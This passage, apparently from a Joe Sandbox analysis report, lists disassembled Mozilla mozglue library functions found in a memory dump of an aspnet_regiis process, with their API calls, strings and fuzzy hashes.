                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                                                                                                    • String ID: MOZ_CRASH()
                                                                                                                                                                    • API String ID: 2055633661-2608361144
                                                                                                                                                                    • Opcode ID: a5e50e9e27c1e03915e09155dfc3c6a0a1c2bbf7df898bfa2bb7a8365d32f9a5
                                                                                                                                                                    • Instruction ID: 91c8a65df470d5b44ee7e15edf371fe360c5e2ce57a0f41cb257ba299b7634aa
                                                                                                                                                                    • Opcode Fuzzy Hash: a5e50e9e27c1e03915e09155dfc3c6a0a1c2bbf7df898bfa2bb7a8365d32f9a5
                                                                                                                                                                    • Instruction Fuzzy Hash: 3C41A3B1B0521B8FEB209FA8DA8DB6A3AF5EB4A348F040439E91597F41D7719804CBD1
                                                                                                                                                                    Function 6C7A7E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7A7EA7
                                                                                                                                                                    • malloc.MOZGLUE(00000001), ref: 6C7A7EB3
                                                                                                                                                                      • Part of subcall function 6C7ACAB0: EnterCriticalSection.KERNEL32(?), ref: 6C7ACB49
                                                                                                                                                                      • Part of subcall function 6C7ACAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C7ACBB6
                                                                                                                                                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C7A7EC4
                                                                                                                                                                    • mozalloc_abort.MOZGLUE(?), ref: 6C7A7F19
                                                                                                                                                                    • malloc.MOZGLUE(?), ref: 6C7A7F36
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7A7F4D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                                                                                                    • String ID: d
                                                                                                                                                                    • API String ID: 204725295-2564639436
                                                                                                                                                                    • Opcode ID: e3e1f6ff5b196cea1dfcc6692430fd62e9c96408668ec85b9993064d3da83bb7
                                                                                                                                                                    • Instruction ID: 813e90b7c6491e6a3431cb1bf7ae046c3bb32667672016e2e596edca5005d6ba
                                                                                                                                                                    • Opcode Fuzzy Hash: e3e1f6ff5b196cea1dfcc6692430fd62e9c96408668ec85b9993064d3da83bb7
                                                                                                                                                                    • Instruction Fuzzy Hash: D231C461F002499BDB109B68CD095BEB7B8EF96208F059739EC4957612EB31B689C391
                                                                                                                                                                    Function 6C7A3E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6C7A3EEE
                                                                                                                                                                    • RtlFreeHeap.NTDLL ref: 6C7A3FDC
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6C7A4006
                                                                                                                                                                    • RtlFreeHeap.NTDLL ref: 6C7A40A1
                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C7A3CCC), ref: 6C7A40AF
                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C7A3CCC), ref: 6C7A40C2
                                                                                                                                                                    • RtlFreeHeap.NTDLL ref: 6C7A4134
                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6C7A3CCC), ref: 6C7A4143
                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6C7A3CCC), ref: 6C7A4157
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Free$Heap$StringUnicode$Allocate
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3680524765-0
                                                                                                                                                                    • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                                                                    • Instruction ID: 1e776c4786d7bec3a09d2326e2341cee1a4d82103bf8e57a08c65455e9928120
                                                                                                                                                                    • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                                                                    • Instruction Fuzzy Hash: 85A182B1A00205CFDB50CF69C98065AB7B5FF48304F2546A9D9099F742D772E846DFA0
                                                                                                                                                                    Function 6C792030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,6C7B3F47,?,?,?,6C7B3F47,6C7B1A70,?), ref: 6C79207F
                                                                                                                                                                    • memset.VCRUNTIME140(?,000000E5,6C7B3F47,?,6C7B3F47,6C7B1A70,?), ref: 6C7920DD
                                                                                                                                                                    • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C7B3F47,6C7B1A70,?), ref: 6C79211A
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E744,?,6C7B3F47,6C7B1A70,?), ref: 6C792145
                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C7B3F47,6C7B1A70,?), ref: 6C7921BA
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E744,?,6C7B3F47,6C7B1A70,?), ref: 6C7921E0
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E744,?,6C7B3F47,6C7B1A70,?), ref: 6C792232
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                                                                                                                    • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                                                                                                                    • API String ID: 889484744-884734703
                                                                                                                                                                    • Opcode ID: 7613a0c6b995fdde78b2c16c5f486d07db460d0b8fd6fd3c0ef65742cc6046e7
                                                                                                                                                                    • Instruction ID: ad8e5daf59103e670fc63bc2ab1a58ca3416bd29a5485e7876a08150a99047a8
                                                                                                                                                                    • Opcode Fuzzy Hash: 7613a0c6b995fdde78b2c16c5f486d07db460d0b8fd6fd3c0ef65742cc6046e7
                                                                                                                                                                    • Instruction Fuzzy Hash: 8F61E131F002168FDB14EFA8DA8DB6E77B5AF85358F294639E524A7F94D7309800C791
                                                                                                                                                                    Function 6C7E9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7E8273), ref: 6C7E9D65
                                                                                                                                                                    • free.MOZGLUE(6C7E8273,?), ref: 6C7E9D7C
                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C7E9D92
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C7E9E0F
                                                                                                                                                                    • free.MOZGLUE(6C7E946B,?,?), ref: 6C7E9E24
                                                                                                                                                                    • free.MOZGLUE(?,?,?), ref: 6C7E9E3A
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C7E9EC8
                                                                                                                                                                    • free.MOZGLUE(6C7E946B,?,?,?), ref: 6C7E9EDF
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?), ref: 6C7E9EF5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 956590011-0
                                                                                                                                                                    • Opcode ID: 16d8a759fb3d30c58bb252be392927a4d0961ae94e4520fd79334bcdecf60004
                                                                                                                                                                    • Instruction ID: 65a57885e2bf40bcf5127c0f9e93634c2fd9ecfb58726c1894b816052bc6b298
                                                                                                                                                                    • Opcode Fuzzy Hash: 16d8a759fb3d30c58bb252be392927a4d0961ae94e4520fd79334bcdecf60004
                                                                                                                                                                    • Instruction Fuzzy Hash: 9471B072909B419BC712CF18D64059BF3F9FFA9314B448619E95A5BB01EB30F885CBC1
                                                                                                                                                                    Function 6C7EDDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C7EDDCF
                                                                                                                                                                      • Part of subcall function 6C7CFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7CFA4B
                                                                                                                                                                      • Part of subcall function 6C7E90E0: free.MOZGLUE(?,00000000,?,?,6C7EDEDB), ref: 6C7E90FF
                                                                                                                                                                      • Part of subcall function 6C7E90E0: free.MOZGLUE(?,00000000,?,?,6C7EDEDB), ref: 6C7E9108
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7EDE0D
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7EDE41
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7EDE5F
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7EDEA3
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7EDEE9
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C7DDEFD,?,6C7A4A68), ref: 6C7EDF32
                                                                                                                                                                      • Part of subcall function 6C7EDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C7EDB86
                                                                                                                                                                      • Part of subcall function 6C7EDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C7EDC0E
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C7DDEFD,?,6C7A4A68), ref: 6C7EDF65
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7EDF80
                                                                                                                                                                      • Part of subcall function 6C7B5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C7B5EDB
                                                                                                                                                                      • Part of subcall function 6C7B5E90: memset.VCRUNTIME140(6C7F7765,000000E5,55CCCCCC), ref: 6C7B5F27
                                                                                                                                                                      • Part of subcall function 6C7B5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C7B5FB2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 112305417-0
                                                                                                                                                                    • Opcode ID: fb05569388eaffbb3f80310cc3f7cd8f03c607b7fa1084dfa2050c87f2120ef3
                                                                                                                                                                    • Instruction ID: d7a9d308d690662bb5c6fc289e0ffc79a18f5098d11f3b6ace9a55b2095a1597
                                                                                                                                                                    • Opcode Fuzzy Hash: fb05569388eaffbb3f80310cc3f7cd8f03c607b7fa1084dfa2050c87f2120ef3
                                                                                                                                                                    • Instruction Fuzzy Hash: BC51C7736016019BD721CB28DA886AE73BABFE9308F95053CD81A57B01D731F919CBC6
                                                                                                                                                                    Function 6C7F5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C7F5C8C,?,6C7CE829), ref: 6C7F5D32
                                                                                                                                                                    • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C7F5C8C,?,6C7CE829), ref: 6C7F5D62
                                                                                                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C7F5C8C,?,6C7CE829), ref: 6C7F5D6D
                                                                                                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C7F5C8C,?,6C7CE829), ref: 6C7F5D84
                                                                                                                                                                    • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C7F5C8C,?,6C7CE829), ref: 6C7F5DA4
                                                                                                                                                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C7F5C8C,?,6C7CE829), ref: 6C7F5DC9
                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 6C7F5DDB
                                                                                                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C7F5C8C,?,6C7CE829), ref: 6C7F5E00
                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C7F5C8C,?,6C7CE829), ref: 6C7F5E45
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2325513730-0
                                                                                                                                                                    • Opcode ID: 1f608718859e4ff797bcca2071656c297c93821aa4db79a03c5fa8bc1161ce2b
                                                                                                                                                                    • Instruction ID: d60cddcca65b78fc476f789b066540c2b63bf210f53e75a632141ce8960edcbd
                                                                                                                                                                    • Opcode Fuzzy Hash: 1f608718859e4ff797bcca2071656c297c93821aa4db79a03c5fa8bc1161ce2b
                                                                                                                                                                    • Instruction Fuzzy Hash: D641AF707002058FCB14DF68D9DDAAE7BF9EF49318F148078E5169B781DB34A806CBA1
                                                                                                                                                                    Function 6C7CCC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C7931A7), ref: 6C7CCDDD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                    • API String ID: 4275171209-2186867486
                                                                                                                                                                    • Opcode ID: ab81a1c8ba253959546d7294857d48dfdef450c4419de86cad0d8596662ee24c
                                                                                                                                                                    • Instruction ID: f4adcf3290d588cc5a7ed6af92f837f182db086d5ac74fd77b58d92f36e97348
                                                                                                                                                                    • Opcode Fuzzy Hash: ab81a1c8ba253959546d7294857d48dfdef450c4419de86cad0d8596662ee24c
                                                                                                                                                                    • Instruction Fuzzy Hash: 7131C5717442075FFB20AFA58E46B6E7BB9AB46719F204425F615ABF80DB70D400C7A2
                                                                                                                                                                    Function 6C79ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C79F100: LoadLibraryW.KERNEL32(shell32,?,6C80D020), ref: 6C79F122
                                                                                                                                                                      • Part of subcall function 6C79F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C79F132
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000012), ref: 6C79ED50
                                                                                                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C79EDAC
                                                                                                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C79EDCC
                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 6C79EE08
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C79EE27
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C79EE32
                                                                                                                                                                      • Part of subcall function 6C79EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C79EBB5
                                                                                                                                                                      • Part of subcall function 6C79EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C7CD7F3), ref: 6C79EBC3
                                                                                                                                                                      • Part of subcall function 6C79EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C7CD7F3), ref: 6C79EBD6
                                                                                                                                                                    Strings
                                                                                                                                                                    • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C79EDC1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                    • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                                    • API String ID: 1980384892-344433685
                                                                                                                                                                    • Opcode ID: d6e7f2c5a1aeab7e0f7ed30072f12fe9a76d14928cbfabf65d7f36aefc8de929
                                                                                                                                                                    • Instruction ID: 50c31f3393f362f786a012bcf253bd3a2a7a0899403b7b3d8c6e1898bc50e407
                                                                                                                                                                    • Opcode Fuzzy Hash: d6e7f2c5a1aeab7e0f7ed30072f12fe9a76d14928cbfabf65d7f36aefc8de929
                                                                                                                                                                    • Instruction Fuzzy Hash: 3C51D471D052088BEB10DF68EA497EEB7B4BF55318F04852DE85567740E7316948C7E2
                                                                                                                                                                    Function 6C80A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C80A565
                                                                                                                                                                      • Part of subcall function 6C80A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C80A4BE
                                                                                                                                                                      • Part of subcall function 6C80A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C80A4D6
                                                                                                                                                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C80A65B
                                                                                                                                                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C80A6B6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                                                                                    • String ID: 0$z
                                                                                                                                                                    • API String ID: 310210123-2584888582
                                                                                                                                                                    • Opcode ID: 26be795e0c22d0b95412beb9658b0cb5452fab12818ce3634a4023984d81b405
                                                                                                                                                                    • Instruction ID: a832407c6d264255c25194fd896d6199c0d87534bd9b78d8708d78ca67d07413
                                                                                                                                                                    • Opcode Fuzzy Hash: 26be795e0c22d0b95412beb9658b0cb5452fab12818ce3634a4023984d81b405
                                                                                                                                                                    • Instruction Fuzzy Hash: 11411871A097459FC351DF28C580A8BBBF5BF89354F408A2EF4A987650E730D949CB93
                                                                                                                                                                    Function 6C7D9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7CAB89: EnterCriticalSection.KERNEL32(6C81E370,?,?,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284), ref: 6C7CAB94
                                                                                                                                                                      • Part of subcall function 6C7CAB89: LeaveCriticalSection.KERNEL32(6C81E370,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7CABD1
                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    Strings
                                                                                                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C7D946B
                                                                                                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C7D947D
                                                                                                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C7D9459
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
